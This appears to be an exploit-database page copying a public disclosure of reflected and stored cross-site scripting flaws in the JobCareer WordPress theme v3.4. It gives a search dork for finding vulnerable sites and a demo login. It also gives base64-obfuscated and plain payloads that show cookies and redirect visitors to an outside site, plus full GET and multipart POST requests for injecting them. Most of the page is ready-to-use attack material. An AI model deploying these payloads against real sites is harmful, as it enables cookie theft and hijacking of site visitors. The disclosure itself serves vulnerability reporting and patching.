Advertisement






JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities

CVE Category Price Severity
CVE-2021-24189 CWE-79 $500 High
Author Risk Exploitation Type Date
Rakesh Mane High Remote 2020-07-27
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.93 0.99403

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070129

Below is a copy:

JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities
[+] Exploit Title: JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/jobcareer/
[+] Date: 2020-07-24
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Chimp Studio [ https://chimpgroup.com ]
[+] Software Version: 3.4
[+] Software Link: https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected & Authenticated Persistent XSS vulnerabilities was discovered in the JobCareer theme through 3.4 for WordPress.

[i] Unauthenticated Reflected XSS -> Vulnerable parameters: job_title, specialisms, location

[i] Authenticated Persistent XSS on Employer Profile -> Complete Address text field

[i] Demo account: vladvector / vector (login / password)

[i] PoC Employer Profile URL: http://jobcareer.chimpgroup.com/employer/vladvector/



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS

[x] Authenticated Persistent XSS



### [ Payloads: ]

[$] "><svg/onload=eval(atob(`amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7`))>

[$] "><!--<img src="--><img src=x onerror=(alert)(`VLADVECTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru/`;//">



### [ PoC Unauthenticated Reflected XSS: ]

[!] http://jobcareer.chimpgroup.com/jobs-modern-list/?job_title=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&specialisms=&cs_search_location_field=&location=&radius=5&cs_=&cs_=Find+Job

[!] GET /jobs-modern-list/?job_title=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&specialisms=&cs_search_location_field=&location=&radius=5&cs_=&cs_=Find+Job HTTP/1.1
Host: jobcareer.chimpgroup.com



### [ PoC Authenticated Persistent XSS -> Employer Profile: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: jobcareer.chimpgroup.com
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------373898295520776006712397621876
Content-Length: 3832
Origin: http://jobcareer.chimpgroup.com
Referer: http://jobcareer.chimpgroup.com/employer-account/?profile_tab=profile
Cookie: [cookies_here]

-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="media_upload"

undefined
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cover_media_upload"

undefined
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_employer_img"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cover_employer_img"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="display_name"

VladVector
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_allow_search"

yes
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_specialisms[]"

banking
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="comp_detail"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_facebook"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_twitter"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_linkedin"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_phone_number"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_email"

[email protected]
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_url"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_country"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_city"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_comp_address"

"><!--<img src="--><img src=x onerror=(alert)(`VLAD\x20VECTOR`);window.location=`https://vladvector.ru/`;//">
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_address"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_latitude"

51.5073509
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_longitude"

-0.12775829999998223
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_add_new_loc"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_zoom"

11
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[established]"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[team-size]"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[type]"

private
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_profile"

update_profile
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_user"

12919
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="action"

ajax_employer_form_save
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="post_id"

12919
-----------------------------373898295520776006712397621876--



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.